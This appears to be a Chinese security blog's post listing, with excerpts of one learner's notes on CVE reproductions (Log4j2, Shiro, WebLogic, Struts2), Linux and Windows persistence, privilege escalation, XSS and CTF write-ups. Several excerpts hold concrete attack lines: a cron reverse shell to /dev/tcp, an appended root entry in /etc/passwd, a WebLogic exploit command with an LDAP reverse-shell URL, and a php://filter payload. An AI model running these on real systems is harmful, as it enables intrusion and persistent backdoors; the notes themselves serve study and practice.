- 博客(41)
- 收藏
- 关注
RSS订阅原创 Windows权限维持
生成木马传到靶机上之后查看木马的路径,把他添加到计划任务里面。然后可以发现已经被添加到服务里面了。直接运行即可添加到计划任务里。sc delete 服务名称。用命令行添加注册表路径。命令框直接执行就可以。3、注册表或目录自启。
2024-04-24 21:47:03
322
原创 Fastjson反序列化漏洞 1.2.24
fastjson是阿里巴巴开发的一款将json字符串和java对象进行序列化和反序列化的开源json解析库。fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行等这类问题。下面是利用的大概流程,首先访问攻击者拿marshalsec启动的LDAP端口,之后会被指向一个恶意的站点,也就是攻击者启动的http服务,去执行恶意代码,建立反弹连接。
2024-03-20 19:41:02
430
原创 Apache shiro550 CVE-2016-4437复现
填好目标地址,然后爆破密钥,用已知的密钥库爆破,然后检测当前的利用链,再爆破利用链,利用链可以进行选择,一个不行就换下一个。apache shiro提供了登录信息保存的功能,服务器在验证用户身份的过程中有反序列化操作,这是导致漏洞的主要原因。随便输入账号密码进行抓包,可以看到有rememberme=remember-me,为shiro的特征。这时就会让服务器访问我们建立好的JRMP的服务,然后让服务器反弹连接到攻击机的7777端口。然后再手动复现一遍:下面是大概的利用方式。# 生成随机16位长度的IV。
2024-03-20 19:38:56
891
原创 struts2 CVE-2021-31805-struts2 s2-061 ONGL远程代码执行复现
接下来我们可以注入下面的payload来进行代码执行,执行id来查看当前用户。我们可以输入下面的命令来测试一下,执行6*6,查看源代码发现可以成功运行。把生成的payload粘贴到exec({''})命令执行函数里边。,这里的ip写攻击机,这里我用的是kali。切换到vulhub开启并且查看靶场的端口。
2024-03-18 19:41:02
878
原创 Linux权限维持后门及应急响应
/1 * * * * bash -i >& /dev/tcp/192.168.10.130/7777 0>&1 #每一分钟把shell反弹到kali上。进入root根目录,删除和用户相关的文件夹 cd 进入根目录,找到ruoji,然后rm -rf ruoji ,删除文件夹。echo "ruoji:x:0:0::/:/bin/sh" >> /etc/passwd #增加超级用户账号。在root根目录下,进入 /var/spool/mail/ 目录下,找到user1相关目录删除。
2024-03-18 18:23:23
874
原创 Linux提权
在linux中,s指的是“强制位权限”,位于user或group权限组的第三位置。如果以root用户身份运行find命令并使用-exec参数,则不需要添加-p参数来保留权限,因为命令将以root用户身份运行。但是,如果你希望以其他用户身份运行执行的命令,则需要使用-p参数来保留权限。在kali攻击机上生成一对密钥,查看生成的公钥,把公钥放到靶机中的/~/.ssh目录下面新建的authorized_keys文件中,下次就可以免密码连接。找到指定漏洞可以拿find命令进行搜索,找到利用的路径,编译后可以使用。
2024-03-18 16:20:59
330
原创 面试题(补充)
fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行等这类问题。该漏洞主要是由于日志在打印时当遇到`${`后,以:号作为分割,将表达式内容分割成两部分,前面一部分prefix,后面部分作为key,然后通过prefix去找对应的lookup,通过对应的lookup实例调用lookup方法,最后将key作为参数带入执行,引发远程代码执行漏洞。
2024-03-18 11:31:01
613
原创 永恒之蓝漏洞复现
CVE-2017-0144 既 永恒之蓝最早爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。SMB是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;(4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。
2024-03-18 11:27:40
880
原创 打靶记录(个人学习笔记)
功能介绍如下:仪表盘(监视器)功能,添加目标功能,漏洞排序功能,扫描功能,发现功能,用户功能,扫描配置功能,网络扫描功能,追踪器功能,防火墙设置,邮件设置,引擎,时间排除功能,代理功能,常规设置主要使用的功能是前面的6个,后面的根据个人的需要进行配置详细介绍如下:Dashboard功能:翻译意思仪表盘(监视器),可以对扫描对扫描完成目标进行排列,可以单独点击进去查看详细的扫描信息;Targets功能:目标,可以对扫描的目标进行添加,可以单个添加,可以多个添加或者按组添加;2)服务器配置的错误。
2024-03-18 11:22:33
961
原创 CVE-2021-44228 Log4j2复现
安装好mvn环境之后,source /etc/profile进行环境,接下来进入到pom.xml所在目录,运行命令mvn clean package -DskipTests,运行完成后生成jar包(位于此目录的target子目录下)现在我们在攻击机marshalsec-0.0.3-SNAPSHOT-all.jar所在目录开启LDAP监听,命令中的1389为LDAP服务的端口,你也可以换成别的端口。最后一步,也是最关键的一步,进行JNDI注入,我们在注入点/solr/admin/cores?
2024-03-18 11:18:27
1542
原创 weblogic CVE-2023-21839详细复现
编译之后运行下面的命令:./CVE-2023-21839 -ip 192.168.10.133 -port 7001 -ldap ldap://192.168.10.130:1389/Basic/ReverseShell/192.168.10.130/9999,第一个ip是靶机的ip地址,第二个ip是攻击机kali的ip。java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.10.130(ip地址为攻击机的ip地址)(2)监听端口(用于接收反弹的shell)
2024-03-15 19:43:55
438
原创 XSS渗透与防御
下面我们用花生壳把kali进行端口映射,也就是把kali放到公网,试试还可以成功吗,用花生壳映射kali的3000端口,因为beef-xss使用的是3000端口。然后使用他的Hook(钩子)去粘贴到有XSS漏洞的地方:,这里我们kali的ip为192.168.101.132。接下来我们把beef-xss提供的Hook写进存在XSS漏洞的地方,可以看到submit提交之后靶机上线成功。把XSS平台提供的代码复制到有XSS漏洞的地方,可以拿到cookie以及一系列信息。使用在线XSS平台进行XSS漏洞的利用。
2024-03-06 10:37:34
565
原创 Json web token (JWT)渗透与防御及ctf例题
可以看到我们登录进去后,用f12检测可以发现他有着jwt形式的token,这里也可以用bp进行抓包,下面用kali中的jwt_tool工具进行破解,可以看到flag。算法为none是因为开发人员为了更方便的修改,把header部分设置为none,从而不用进行第三部分签名的认证。从题目中可以知道必须要成为admin才可以得到flag,而我们是guest,所以我们可以试试把签名设置为空。还有一道类似的题,需要用到爆破工具,可以抓到包,看到jwt数据,拿到kali中进行jwt工具的扫描。
2024-03-06 10:35:19
842
原创 逻辑漏洞靶场实战
接下来再设置俩个爆破点的参数,第一个爆破点,要爆破密码,所以我们可以利用密码字典或者手动添加密码,第二个爆破点要爆破token值,所以要使用这个模块,用这个模块来获取token值,下面是爆破之后的。首先通过抓包,再对要进行爆破的地方添加标记,这里有俩个爆破点,一个是密码,还有一个是token。用bp抓到返回的包后,把他放到软件Pkav HTTP Fuzzer里面,并且在右边设置好字典。用自定义迭代器设置三个位置,”账号“,“:”,”密码“2、爆破-IP封锁和密码错误次数。1、爆破-验证码爆破实验。
2024-03-05 18:20:52
588
原创 Msfconsole详细教程
Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。选择架构平台:x86 | x64 | x86_64Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe。
2024-03-05 18:16:42
1702
1
原创 docker的简单使用
因为docker是默认从docker的官网进行拉取,所以拉取经常速度很慢或者失败,我们先要进行一下配置,让他优先从国内镜像进行拉取。补充: -p 80:80 是将容器里的80端口(右边的80端口)映射到kali的80端口(左边的80)(网站服务)删除镜像的命令格式为:其中,OPTIONS是可选项,IMAGE是要删除的镜像名称或ID,可以同时删除多个镜像。在一些进行使用靶场或者工具的时候,我们可以用docker在线拉取,就可以省去手动搭建靶场的过程。如果要删除多个镜像,可以在命令中指定多个镜像名称或ID。
2024-03-03 17:11:13
924
原创 dirmap目录扫描工具简单使用
fuzz_mode_ext.txt “fuzz模式”字典,使用常见后缀制作的字典;dictmult该目录为“字典模式”默认多字典文件夹,包含:BAK.min.txt(备份文件小字典),BAK.txt(备份文件大字典),LEAKS.txt(信息泄露文件字典);fuzzmult该目录为“fuzz模式”默认多字典文件夹,包含:fuzz_mode_dir.txt(默认目录字典),fuzz_mode_ext.txt(默认后缀字典)。#跳过显示页面大小为x的页面,若不设置,请配置成"None",默认配置“None”。
2024-03-03 17:10:03
885
原创 简单的信息收集途径记录
CDN:可以分摊内容,用户访问时候会找最近的服务器,减少了访问的压力,提高了访问的速度。nslookup -type="MX" 域名 查询邮件交换记录。站长工具中的ping检测,可以查到哪个地区优先连接的IP地址。可以通过注册人的邮箱或者姓名查看他所注册过的域名。nslookup也可以指定查询的类型。4、如何获取CDN背后的真实IP。过滤HTTP/HTTPS的请求。*ldb是kali里的命令。1、dns服务器传输过程。八、网络空间搜索引擎-上。查看网址的历史DNS。七、搜索引擎搜索信息。
2024-03-03 16:55:20
371
原创 Burpsuite安装详细教程(附下载链接)
然后win+r输入cmd,再输入java -version查看jdk的版本,看到下面的提示即为成功,这里我们的准备工作就完成了。打开电脑的系统环境变量,右键电脑->属性,然后按下图操作,windows版本不同可能环境变量位置不太一样,但是流程是一样的。然后把2中的内容复制到右边的Activation里面,再把下面出现的内容复制到3里面完成激活。下载链接在最下面,需要的师傅可以直接移步到最下面,教程都是自己用虚拟机重新安装的,真实可用。然后打开火狐的设置,搜索证书,把我们下载的证书导入进去。
2024-03-03 16:49:09
1229
原创 面试题个人总结(面经)
你好,我叫XXX,是今天面试初级蓝队的人员,我毕业于XXXX,专业为网络空间安全,我曾经在XXXXX实习过,有过大概一年左右的工作经验,还有过一定的护网经验,去年在奇安信厂商护过网,在监测岗(在流量传感器中监测告警信息和恶意流量,发攻击ip到封禁群里,通知每日的告警数量并整理),在专业上我熟悉基本的漏洞类型,如:SQL注入、XSS、CSRF、SSRF、文件上传等漏洞,熟悉sqlmap,burpsuite,wireshark、msf、cs等渗透工具使用。它是一种过滤器,可以作为一个中间流来过滤其他的数据流。
2024-03-03 16:27:57
955
原创 kali系统安装与使用aquatone
截图文件默认保存至aquatone安装目录下的screenshots目录中,比如安装到了/tools/aquatone下面,则截图目录在/tools/aquatone/screenshots。ln -s aquatone的绝对路径 /usr/bin/aquatone 假如在/tools/aquatone/aquatone,则执行。解压后直接执行二进制文件aquatone即可,假设需要收集信息的站点每行一个写在文件all_Sites中。如果需要修改保存目录,可以在运行时增加-out参数指定,如。
2024-03-03 16:25:17
425
原创 Xray和Rad联动
xray webscan --listen 127.0.0.1:7777 --html-output proxy.html (监听自己本机的7777端口,然后扫描之后的结果保存到html文件中。默认情况下,将会启用所有内置插件,可以使用下列命令指定本次扫描启用的插件,可以加--html-output参数把输出到指定的html中。检测目标网站是否存在Struts2系列漏洞,包括s2-016、s2-032、s2-045、s2-059、s2-061等常见漏洞。检测ThinkPHP开发的网站的相关漏洞。
2024-03-03 16:23:10
946
原创 解决cs不能生成Linux木马的问题
要下载的是上面圈起来的两个就行了 ,genCrossC2的文件类型主要是看你客户端的主机是什么系统,如果你是linux就下linux,如果是windows就下win,以此类推。接下来看操作,这里我的客户端是windows,所以下载windows的。服务端自动生成 .cobaltstrike.beacon_keys,如果没有重新导入几次,然后把这个文件放到CrossC2插件文件夹下,这个文件很重要,是CS的密钥文件,因为CrossC2插件仅支持 reverse_https 协议。下载插件:CrossC2。
2024-03-02 22:04:20
467
2
原创 攻防世界(功夫再高也怕菜刀)
用wireshark打开,发现基本都是tcp流量,首先想到tcp追踪流,但是这么多数据,不知道追踪哪个,所以我们先ctrl+f,搜索flag关键字,发现了一个可疑的流量,但是没有什么可以利用的信息。但是又点了几次查找之后,发现有一个6666.jpg的图片,把他的数据复制下来(从FFD8开始到FFD9结束)在winhex打开。发现分离出来一个压缩包,但是需要密码才能查看,所以我们现在一般都要在流量包里面找关于密码的信息。下载附件,用binwalk或者foremost去分离一下,看看有什么隐藏的文件。
2023-06-12 21:47:23
131
原创 Lampiao靶场渗透
这时候我们可以用得到的密码字典去拿hydra九头蛇进行ssh端口爆破,hydra -l tiago -P password.txt 192.168.101.133 ssh(“l”是用指定的用户名,“L”是用用户名字典,p和P同理),可以看到爆破成功,账号为tiago,密码为Virgulino。1.内核提权---脏牛提权最为典型 ,内核提权一般包括3个步骤,信息收集发现版本号,找到相关版本的exp,使用找到的exp对目标发起攻击,完成提权功能。pty.spawn("/bin/bash")'获取到真终端。
2023-06-05 15:52:49
222
原创 每天一道CTF(Web方向)
第一个参数是搜索要进行代替的值,为test,第二个参数是要进行替换的参数,为我们get输入的字符,第三个参数为要被进行替换的字符串,这行代码的大概意思就是用我们传进去的字符把just test中的test字符替换掉,在本题中我们传入:?首先可以判断他要求我们的X-Forwarded-For字段为127.0.0.1才会进行下面的函数,那我们就用burosuite抓包,添加字段X-Forwarded-For:127.0.0.1,发现代码往下运行了,输出了Welcome My Admin!
2023-05-16 21:56:20
80
原创 每天一道CTF(Misc)
得到flag,通过从网上搜大佬的解答,又掌握了一点新知识,可以用strings命令在文件中进行过滤,之前只会用grep过滤。首先下载附件,用wireshark打开,发现是全是数据流,无从下手,先ctrl+f查找flag,但是。换一个思路,使用 linux strings 命令查看对{进行匹配。好像得到的不是flag。
2023-05-10 22:13:20
23
原创 每天一道CTF(Web方向)
进入题目,发现提示,ip地址需要为指定的ip,所以我们在此页面用burpsuite进行抓包,放到repeater重放模块中,增加X-Forwarded-For字段修改ip地址进行重放。重放之后提示访问的地址需为google,我们可以再次加refer字段伪造成从google进行请求。所以我们再加Referer字段改为从google访问,看到flag值。
2023-05-10 20:23:09
51
原创 每天一道CTF(Web方向)
filter伪协议:用于读取源码,通过get请求提交参数。通常使用该协议来读取或者写入部分数据,且在读取和写入之前对数据进行一些过滤,例如base64编码处理,rot13处理等。filename=php://filter/convert.iconv.utf-8.utf-16/resource=flag.php来读取check.php的源代码。进入题目看到代码,是关于文件包含的代码,所以我们可以想到伪协议,看到包含了check.php文件,所以可以拿filter伪协议来读取check.php的源代码。
2023-05-08 19:25:55
55
原创 每天一道CTF(Web方向)
in_array, 检查数组中是否存在某个值,这里就是检查method的变量是否为ping(就是我们传进来的第一个参数在不在数组(arrar(“ping”)中),如果是ping就进行下一步,all_user_func_array()—调用回调函数(把一个数组参数作为回调函数的参数,第二个数组为被传入的索引数组),所以我们传入的第二个参数要为数组,$this是当前的ease类,$this->method是调用类里的ping函数,进行命令执行(这里我们传入的第一个参数为ping,所以调用ping函数)
2023-05-05 21:57:28
40
原创 每天一道CTF(Misc杂项)
进入题目,先下载附件,下载解压之后得到一张图片,放到StegSolve图片隐写查看工具中,在这一个页面可以发现一张二维码。通过截图,再把二维码放到 CQR二维码扫描器中进行扫描,发现扫描出来一段十六进制,放到winhex中(010也可以)。,反编译之后得到python代码,放到pychrm中调用函数flag()即可跑出flag值。保存为pyc格式文件,这里我借助在线反编译器进行反编译。
2023-04-18 15:35:58
144
原创 每天一道CTF(Web方向)
进入题目页面,可以看到明显是要考察我们对于cookie的知识是否了解,这里我想到了两种方法。提示让我们访问cookie.php,再查看网络模块中的回包,可以看到flag。2、也可以在控制台中输入document.cookie得到cookie。1、f12调试--->在网络模块中查看消息头里面的cookie。
2023-04-16 23:23:40
22
原创 每天一道CTF(Web方向)
进入题目界面,可以看到让我们用get方法提交一个名为a,值为1的变量,所以我们按他的要求进行操作,提交之后又让用POST方式提交一个名为b,值为2的变量 ,看到flag值。
2023-04-15 22:42:17
27
原创 每天一道CTF(Web方向)
进入题目界面,发现确实和题目说的一样,点不了鼠标右键,查看不了源代码,但是我们还可以用快捷键F12(不行的话就按Fn+F12),可以看到flag。攻防世界view_source。
2023-04-15 22:37:39
35
原创 每天一道CTF(web方向)
点进去之后可以看到url中有?id=1,而且根据题目提示,有一处地方留下了入侵者痕迹,所以我们可以便利一下id的值,这里我们拿burpsuite去遍历,抓包-->放到intruder暴力破解模块-->在id=1处添加标记进行对1的遍历。点击length来按返回数据包的长度排序,发现id=2333时返回的长度和其他不同,可以在返回包中看到flag。进入靶场,可以看到页面,我们可以每个页面都点击点击,看看有什么可以利用的地方,发现只有一个报表中心能点。选择number模块,从1-5000进行遍历,步数为1。
2023-04-15 22:32:45
44
1
原创 每天一道CTF(Web方向)
漏洞(CVE-2016-7124)使序列化字符串中表示对象属性个数的值大于真实的属性个数,以此跳过__wakeup 的执行,达到绕过的目的,所以我们把O:4:"xctf":1:{s:4:"flag";所以我们可以自己写php代码把他进行序列化,然后通过构造payload来进行绕过_wakeup(_wakeup函数会执行exit退出函数,所以要饶过他)代码大概意思:把xctf的类赋值给新建变量$a,然后把经过序列化的变量$a赋值给变量$b,打印$b,得到序列化之后的值。攻防世界unserialize3。
2023-04-15 11:41:10
47
1
原创 每天一道CTF(web方向)
我们可以查url编码表来进行编码,这里举例a的编码:先对%25进行url解码得到%本身,而61是数字不用解码,就得到%61,以此类推,admin编码为%2561%2564%256D%2569%256E。所以我们要访问index.phps,可以看到是php代码(代码审计),大概代码意思就是将通过get方式传进来的id的参数进行十六进制解码,如果解码后等于admin,就会输出key,也就是flag。进入index.php目录下面,发现还是和之前的页面一样,这题涉及了phps的知识。
2023-04-15 11:16:59
279
1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人